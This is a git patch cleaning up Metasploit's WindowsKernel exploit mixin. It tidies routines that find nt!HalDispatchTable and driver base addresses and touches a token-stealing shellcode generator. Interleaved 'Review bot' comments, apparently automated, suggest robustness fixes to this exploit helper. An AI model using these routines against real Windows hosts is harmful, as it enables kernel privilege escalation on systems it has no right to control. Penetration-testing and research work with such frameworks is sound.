From 43a5120696e69264191c47a442ea9dc5bf20f56d Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Sat, 2 Aug 2014 08:08:59 -0700
Subject: [PATCH] Cleanup the WindowsKernel mixin
---
 lib/msf/core/exploit/local/windows_kernel.rb | 45 ++++++++++----------
 1 file changed, 22 insertions(+), 23 deletions(-)
diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 8cdc7d88f2..5c5664d544 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -2,7 +2,6 @@
 module Msf
 module Exploit::Local::WindowsKernel
- #
 # Find the address of nt!HalDispatchTable.
 #
@@ -12,24 +11,24 @@ module Exploit::Local::WindowsKernel
 kernel_info = find_sys_base(nil)
 vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
- hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
- if hKernel['return'] == 0
- print_error("Failed to load #{kernel_info[1]} (error: #{hKernel['GetLastError']})")
+ h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+ if h_kernel['return'] == 0
+ print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})")
 return nil
 end
- hKernel = hKernel['return']
+ h_kernel = h_kernel['return']
- halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
- if halDispatchTable['return'] == 0
- print_error("Failed to retrieve the address of HalDispatchTable (error: #{halDispatchTable['GetLastError']})")
+ hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable')
+ if hal_dispatch_table['return'] == 0
+ print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})")
 return nil
 end
- halDispatchTable = halDispatchTable['return']
+ hal_dispatch_table = hal_dispatch_table['return']
- halDispatchTable -= hKernel
- halDispatchTable += kernel_info[0]
- vprint_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
- halDispatchTable
+ hal_dispatch_table -= h_kernel
+ hal_dispatch_table += kernel_info[0]
+ vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
+ hal_dispatch_table
 end
 #
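Review bot: `kernel_info[0]` on the second line of the hunk is dereferenced before anything checks that `find_sys_base(nil)` actually located the kernel image; if that helper returns nil on its fall-through path (which lies outside this hunk), the method dies with NoMethodError instead of the `return nil` every other failure path in the hunk uses. A guard such as `return nil unless kernel_info` ahead of the first `vprint_status` would make the error handling consistent. The `vprint_status("HalDisPatchTable Address: ...")` line is carried over with its mixed-case typo; `nt!HalDispatchTable` would match the error message renamed in this same hunk. The module handle obtained from `LoadLibraryExA` is also never released, so each call leaves one more mapping of the kernel image in the session process; if railgun's kernel32 definition exposes it, a `session.railgun.kernel32.FreeLibrary(h_kernel)` once the offset has been computed would close that. The enclosing method begins before this hunk.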
@@ -48,28 +47,28 @@ module Exploit::Local::WindowsKernel
 'EnumDeviceDrivers',
 'BOOL',
 [
- ["PBLOB", "lpImageBase", "out"],
- ["DWORD", "cb", "in"],
- ["PDWORD", "lpcbNeeded", "out"]
+ %w(PBLOB lpImageBase out),
+ %w(DWORD cb in),
+ %w(PDWORD lpcbNeeded out)
 ])
 session.railgun.add_function(
 'psapi',
 'GetDeviceDriverBaseNameA',
 'DWORD',
 [
- ["LPVOID", "ImageBase", "in"],
- ["PBLOB", "lpBaseName", "out"],
- ["DWORD", "nSize", "in"]
+ %w(LPVOID ImageBase in),
+ %w(PBLOB lpBaseName out),
+ %w(DWORD nSize in)
 ])
 end
 results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
- addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*")
+ addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 addresses.each do |address|
 results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
 current_drvname = results['lpBaseName'][0..results['return'] - 1]
- if drvname == nil
+ if drvname.nil?
 if current_drvname.downcase.include?('krnl')
 return [address, current_drvname]
 end
@@ -81,7 +80,8 @@ module Exploit::Local::WindowsKernel
 #
 # Generate x86 token stealing shellcode suitable for use when overwriting the
- # halDispatchTable+0x4.
+ # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
+ # registers.
 #
 # @param target [Hash] The target information containing the offsets to _KPROCESS,
 # _TOKEN, _UPID and _APLINKS.
@@ -108,6 +108,5 @@ module Exploit::Local::WindowsKernel
 tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
 tokenstealing
 end
-
 end
 end
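Review bot: The `addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1]` line slices the output buffer by `lpcbNeeded`, yet the call only requests `cb` of 1024 bytes; if, as with the other PSAPI enumerators, `lpcbNeeded` reports the bytes required rather than the bytes written, a host with more than 256 loaded drivers makes the slice run past the filled region of the 4096-byte railgun buffer and the loop then unpacks unwritten bytes as driver base addresses. Clamping the slice to what was requested, `[0..[results['lpcbNeeded'], 1024].min - 1]`, keeps the unpack inside written data; retrying with a larger `cb` when `lpcbNeeded` exceeds it would be the fuller fix. `current_drvname = results['lpBaseName'][0..results['return'] - 1]` has a related edge: when `GetDeviceDriverBaseNameA` returns 0 the range becomes `0..-1` and the whole 48-byte buffer is treated as the driver name, so `next if results['return'] == 0` before that line would skip failed lookups. The enclosing `find_sys_base` starts and ends outside this hunk.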